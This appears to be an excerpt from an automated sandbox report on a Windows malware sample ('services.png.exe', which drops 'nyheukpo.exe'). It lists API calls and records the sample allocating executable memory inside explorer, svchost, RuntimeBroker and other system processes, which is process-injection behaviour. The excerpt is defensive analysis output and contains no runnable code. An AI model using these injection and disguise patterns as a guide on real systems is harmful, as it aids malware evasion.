                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438BD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000001CD438BD2A4
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00421A5A LoadLibraryW,GetProcAddress,FreeLibrary,0_2_00421A5A
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0041ED2B mov edx, dword ptr fs:[00000030h]0_2_0041ED2B
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0282ED2B mov edx, dword ptr fs:[00000030h]0_2_0282ED2B
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_0041ED2B mov edx, dword ptr fs:[00000030h]1_2_0041ED2B
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0041F09D CreateThread,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,GetCommandLineW,Sleep,CreateEventW,GetLengthSid,GetCurrentProcessId,0_2_0041F09D
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438BD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000001CD438BD2A4
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438B7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000001CD438B7D90
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A6567D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000151A6567D90
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A656D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000151A656D2A4
                        Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000019E29CFD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0000019E29CFD2A4
                        Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000019E29CF7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0000019E29CF7D90
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000001F28B4ED2A4
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000001F28B4E7D90
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B54D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000001F28B54D2A4
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000001F28B547D90
                        Source: C:\Windows\explorer.exeCode function: 6_2_09077D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_09077D90
                        Source: C:\Windows\explorer.exeCode function: 6_2_0907D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0907D2A4
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D596D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000221D596D2A4
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D5967D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000221D5967D90
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 9_2_000001ECFC697D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001ECFC697D90
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 9_2_000001ECFC69D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001ECFC69D2A4
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D178747D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000001D178747D90
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D17874D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000001D17874D2A4
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D1787A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000001D1787A7D90
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D1787AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000001D1787AD2A4
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B6120D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000023B6120D2A4
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B61207D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000023B61207D90
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B6126D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000023B6126D2A4
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B61267D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000023B61267D90
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000002135E7ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002135E7ED2A4
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000002135E7E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002135E7E7D90
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E8187D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001F6E8187D90
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E818D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001F6E818D2A4

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\services.png.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 2960000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\sihost.exe base: AC0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: A50000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\explorer.exe base: C350000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\svchost.exe base: D40000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 110000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 290000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\svchost.exe base: FB0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\dllhost.exe base: AC0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\conhost.exe base: 30000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: E20000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 810000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: EE0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2990000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E30000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2530000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E50000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25D0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C90000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F50000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B30000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2390000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29E0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1640000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2310000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A50000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2720000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2740000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11B0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EA0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24C0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D00000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3190000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A40000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C60000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2970000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B20000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 27E0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2210000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2880000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11E0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DA0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26D0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2580000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C40000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25B0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F10000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 700000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C70000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2610000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 6D0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1130000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 9D0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: B90000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25E0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C10000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000 protect: page execute and read and writeJump to behavior
